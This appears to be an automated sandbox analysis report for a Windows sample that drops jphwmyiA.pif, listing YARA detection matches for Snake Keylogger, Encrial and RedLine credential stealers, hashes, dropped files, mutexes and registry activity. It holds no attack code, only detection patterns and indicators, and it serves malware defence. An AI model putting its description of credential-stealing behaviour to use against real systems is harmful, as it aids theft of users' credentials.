Source: 3.2.jphwmyiA.pif.27870000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.jphwmyiA.pif.25350000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.jphwmyiA.pif.27870000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.jphwmyiA.pif.25350000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.jphwmyiA.pif.1b30a8c6.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.jphwmyiA.pif.25350000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.jphwmyiA.pif.2a120000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.jphwmyiA.pif.29f60000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.jphwmyiA.pif.1e190000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.jphwmyiA.pif.1d9f0ee8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.3.jphwmyiA.pif.2352c260.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.3.jphwmyiA.pif.2352c260.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.jphwmyiA.pif.29cca8c6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.3.jphwmyiA.pif.2352c260.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.jphwmyiA.pif.29cca8c6.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.jphwmyiA.pif.1e190000.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.jphwmyiA.pif.1d9f0ee8.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.jphwmyiA.pif.1d9f0ee8.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.3.jphwmyiA.pif.2352c260.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.jphwmyiA.pif.1e190000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.jphwmyiA.pif.29f60ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.jphwmyiA.pif.27870000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.jphwmyiA.pif.29f60000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.jphwmyiA.pif.29cca8c6.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.jphwmyiA.pif.25350000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.jphwmyiA.pif.1d9f0ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.jphwmyiA.pif.1d9f0ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.jphwmyiA.pif.1d9f0ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.jphwmyiA.pif.25350000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.jphwmyiA.pif.25350000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000003.00000002.4109204899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000003.00000001.1687216190.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000C.00000002.4109307157.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000002.4109202248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000007.00000001.1805725850.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000C.00000001.1881316189.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: Process Memory Space: jphwmyiA.pif PID: 340, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: jphwmyiA.pif PID: 6800, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: jphwmyiA.pif PID: 3808, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 3.2.jphwmyiA.pif.250ba8c6.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.jphwmyiA.pif.250ba8c6.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.jphwmyiA.pif.25350ee8.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.jphwmyiA.pif.25350ee8.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.jphwmyiA.pif.27870000.6.raw.unpack, -j.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.jphwmyiA.pif.27870000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.jphwmyiA.pif.27870000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.jphwmyiA.pif.27870000.6.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.jphwmyiA.pif.27870000.6.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.3.jphwmyiA.pif.2352c260.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.3.jphwmyiA.pif.2352c260.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@21/7@5/5

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe

Code function: 0_2_02937F52 GetDiskFreeSpaceA,

0_2_02937F52

Source: C:\Users\Public\Libraries\jphwmyiA.pif

Code function: 3_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

3_2_004019F0

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe

Code function: 0_2_02946D48 CoCreateInstance,

0_2_02946D48

Source: C:\Users\Public\Libraries\jphwmyiA.pif

3_2_004019F0

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe

File created: C:\Users\Public\AiymwhpjF.cmd

Jump to behavior

Source: C:\Users\Public\Libraries\jphwmyiA.pif	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1440:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2536:120:WilError_03

Source: C:\Users\Public\Libraries\jphwmyiA.pif	Command line argument: 08A	3_2_00413780
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Command line argument: 08A	3_2_00413780
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Command line argument: 08A	3_1_00413780
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Command line argument: 08A	7_2_00413780

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: yxU3AgeVTi.exe	Virustotal: Detection: 34%
Source: yxU3AgeVTi.exe	ReversingLabs: Detection: 26%

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe

File read: C:\Users\user\Desktop\yxU3AgeVTi.exe

Jump to behavior

